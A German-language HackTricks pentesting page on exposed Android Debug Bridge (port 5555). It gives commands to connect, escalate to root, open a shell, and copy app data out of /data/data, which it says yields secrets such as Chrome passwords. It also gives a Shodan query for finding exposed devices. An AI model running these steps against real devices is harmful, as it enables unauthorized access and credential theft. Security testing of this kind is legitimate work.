# 5555 - Android Debug Bridge {{#include ../banners/hacktricks-training.md}} ## Grundlegende Informationen Von [den Dokumenten](https://developer.android.com/studio/command-line/adb): **Android Debug Bridge** (adb) ist ein vielseitiges Befehlszeilenwerkzeug, mit dem Sie mit einem Gerät kommunizieren können. Der adb-Befehl erleichtert eine Vielzahl von Geräteaktionen, wie z.B. **das Installieren und Debuggen von Apps**, und bietet **Zugriff auf eine Unix-Shell**, die Sie verwenden können, um eine Vielzahl von Befehlen auf einem Gerät auszuführen. **Standardport**: 5555. ``` PORT STATE SERVICE VERSION 5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909) ``` ## Verbinden Wenn Sie den ADB-Dienst, der auf einem Port eines Geräts läuft, finden und sich damit verbinden können, **können Sie eine Shell im System erhalten:** ```bash adb connect 10.10.10.10 adb root # Try to escalate to root adb shell ``` Für weitere ADB-Befehle siehe die folgende Seite: {{#ref}} ../mobile-pentesting/android-app-pentesting/adb-commands.md {{#endref}} ### App-Daten dumpen Um die Daten einer Anwendung vollständig herunterzuladen, können Sie: ```bash # From a root console chmod 777 /data/data/com.package cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data. adb pull "/sdcard/com.package" ``` Sie können diesen Trick verwenden, um **sensible Informationen wie Chrome-Passwörter abzurufen**. Für weitere Informationen dazu überprüfen Sie die Informationen in den bereitgestellten Referenzen [**hier**](https://github.com/carlospolop/hacktricks/issues/274). ## Shodan - `android debug bridge` {{#include ../banners/hacktricks-training.md}}